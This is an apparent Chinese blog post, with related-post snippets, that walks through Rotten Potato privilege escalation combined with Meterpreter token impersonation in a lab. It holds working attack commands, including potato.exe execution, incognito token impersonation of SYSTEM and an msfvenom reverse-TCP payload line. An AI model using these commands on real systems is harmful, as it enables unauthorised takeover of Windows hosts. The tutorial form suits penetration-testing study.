烂土豆配合令牌窃取提权复现

最新推荐文章于 2024-04-18 19:36:30 发布
最新推荐文章于 2024-04-18 19:36:30 发布
阅读量165 收藏 1
点赞数
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65096687/article/details/130655826
版权

烂土豆配合令牌窃取提权是用来解决普通令牌窃取提权因为webshell权限太低无法提权成功

环境:内网kali和win10

1.先用msf生成一个windows的后门监听上线

2.在网上下载烂土豆

3.利用msf上传烂土豆

4.使用msf自带的令牌窃取功能

先查看一下未提权的权限

execute -cH -f ./potato.exe 

运行烂土豆
use incognito

使用令牌窃取模块

 list_tokens -u

查看可以窃取的列表
impersonate_token "NT AUTHORITY\SYSTEM"

窃取system的权限

 

 

 

不过是三年五载
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Potato提权小结
wo41ge的博客
11-11 1万+
前言 当我们拿到webshell 却苦于无法提权 早之前有巴西烤肉提权,有pr提权 今天 来一个土豆提权合集 妈妈再也不担心我的webshell无法提权了 Hot Potato 前言 利用 Windows 中的已知问题在默认配置中获得本地权限提升 即 NTLM 中继(特别是 HTTP->SMB 中继)和 NBNS 欺骗 攻击者可以在安装了Windows操作系统的工作站中将自己的低权限提升至NT AUTHORITY\SYSTEM 影响范围 Windows 7、8、10、Server 2008 和 Ser
PoCs-win提权.zip
04-08
5. **权限令牌窃取**:攻击者获取其他高权限进程的令牌,然后将自己的进程与该令牌关联,从而获得相应的权限。 在"PoCs-master"文件夹中,我们可以找到各种不同的PoC实例,每个实例都对应一种或多种提权技术。分析...
土豆+令牌窃取提权
kimojinmmp的博客
04-03 199
土豆+令牌窃取提权(win2008及之前可以直接使用令牌窃取提权) potato.exe:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS16-075/potato.exe # 1.生成shell上传到目标主机 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.106.150 LPORT=4433 -f exe -o 4433.exe # 2.开启msf u
Windows提权土豆
最新发布
2401_84275261的博客
04-18 552
我们今天利用土豆来对windows进行提权;靶机:windows-2003我们先用kali的msf工具生成一个木马。msf启动命令:msfconsole,或者直接输入命令来生成木马这里先启动msf然后我们生成木马最后通过通过中国菜刀将我们生成的木马放入目标网站启动msf的监听状态设置参数。接下来用最常规的方法提权,发现提权失败我们需要查找可以利用的漏洞,今天以“土豆”为例作为演示设置对应的参数,并开始攻击结果还是不能成功拿到权限,我们可以用伪造token值(在身份认证中,token是令牌(临时)的意思,
土豆搭配令牌窃取提权&dll劫持搭配令牌窃取提权&不带引号服务路径问题提权&不安全的服务权限配置提权
weixin_46626159的博客
03-21 957
土豆搭配令牌窃取提权&dll劫持搭配令牌窃取提权&不带引号服务路径问题提权&不安全的服务权限配置提权
土豆提权复现
longwanlian的博客
10-16 274
值得注意的是,土豆方法只适用于符合特定条件的Windows版本和配置,例如使用旧版的Windows Server操作系统以及较早的Windows 10版本。根据微软的修补程序,土豆漏洞已经在最新版本的Windows中被修复。本次为复现提权的实验,所以就对传递shell之间的细节忽略,拖拽shell上传目标靶机,在双击文件,笔记是一边复现一边写的。现在改用windows版本的msf倒是成功进入meterpreter后渗透模块。然后依旧没有成功,休息了一下,晚上看的时候就成功了,有时候还怪玄学的。
Windows土豆提权复现(MS16-075)
oiadkt的博客
03-08 2056
Windows土豆提权复现(MS16-075)
权限提升-windows令牌窃取土豆-引号路径提权
告白的博客
09-09 400
0x00 提权方式简介 总结几种除开补丁本地提权的另外几种比较使用的windwos提权 1)土豆配合令牌窃取提权--------webshell提权本地system 2)不安全的引号服务路径提权------本地提权 以及其他的dll劫持,accesschk64提权–本地提权,Alwayslnstallelevated提权等等 这种重点介绍土豆与不安全的引号路径提权,其他使用起来比较鸡肋,可自行百度学习 0x01 提权实战 1)土豆配合令牌窃取webshell到system 使用kali生成后门文件,上
vb.rar_VB 提权_进程提权
09-20
在这个“vb.rar_VB 提权_进程提权”的主题中,我们主要关注的是如何在VB.NET环境中实现进程权限的提升,以便能够执行如杀掉任何进程等需要更高权限的操作。 在Windows操作系统中,每个进程都有自己的安全属性,包括...
窃取AccessToken的方法:incognito.exe程序
07-28
令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。...窃取AccessToken的方法: incognito.exe程序 、InvokeTokenManipulat.ps1脚本 、MSF里的incognito模块
system提权工具
09-16
"system提权工具"是指能够帮助用户获取或提升到system权限级别的工具。这类工具通常被系统管理员和安全研究人员用来进行合法的系统调试、故障排除或安全审计。然而,不正当的使用可能导致严重的安全风险,因为system...
BadPotato:Windows权限提升BadPotato
03-19
土豆 Windows 2012-2019 Windows 8-10 引用
第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
本文以“第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1”为主题,探讨了四种不同的提权策略,分别是通过数据库应用提权、Redis数据库权限提升、PostgreSQL数据库权限提升以及Windows系统的令牌窃取和进程注入...
Windows-土豆提权
qq_43381463的博客
03-09 711
土豆提权,即使用CVE-2016-3225(MS16-075)漏洞进行提权,当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。攻击者登录系统后,运行一个经特殊设计的应用程序利用此漏洞,从而控制受影响的系统。
提权 - Windows 土豆/ dll劫持 /服务权限
acepanhuan的博客
03-01 1201
提权 - Windows 土豆/ dll劫持 /服务权限
多汁土豆(JuicyPotato)的提权使用
zhanqinli的博客
04-21 896
4、接着打开结果日志result.log文件,可以看到有部分的clisd是system权限,选择其中一个,在命令行中输入>JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1111 -c {000C101C-0000-0000-C000-0000000000461}链接:https://pan.baidu.com/s/1Ev-0THVltaSMDipFvBcrFg。2、在命令行窗口使用whoami /priv查看权限,如果全都禁用则无法提权
Potato提权(原理简述)
qq_18811919的博客
12-29 1440
在红蓝对抗过程中Web打点之后往往需要进行提权才能进行横向操作,本篇文章将简单讲述土豆提权原理。
MSF+土豆家族窃取访问令牌提权
m0_65554829的博客
11-17 422
在Rotten Potato中使用的 COM 对象为BITS,而Juicy Potato为不同 Windows 版本提供了多个可以利用的COM对象。#在https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md上查找要加载的COM对象的CLSID。在之后的版本中,微软通过检查RPC绑定字符串中指定的端口来修复了这个问题,修复后的系统无法通 过原来的方法实现中间人攻击。# -c,指定要加载的COM对象的CLSID。
域渗透之热土豆提权
weixin_45612728的博客
02-18 457
注意这个不是提域控的管理身份,而是利用普通的域用户进行提取为本地的管理员权限.只需要知道普通域用户的账号和密码即可,这个可以通过抓取本地的用户hash进行用hashcat进行破解即可. 一开始使用普通的域用户来创建用户是创建不成功的. 2.使用Potato.exe来进行创建用户. ip是本地的域用户ip,net user是创建一个用户,net localgroup是添加到管理员组中. Potato.exe -ip 192.168.0.207 -disable_exhaust true -cmd "C:
第一百一十课:窃取,伪造模拟各种windows访问令牌[token利用]1
08-03
"本课程主要讲解了如何在Windows系统中窃取、伪造和模拟访问令牌,特别是通过CobaltStrike、meterpreter的incognito模块、Invoke-TokenManipulation.ps1脚本、Tokenvator.exe和Mimikatz工具来实现。课程内容涵盖了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值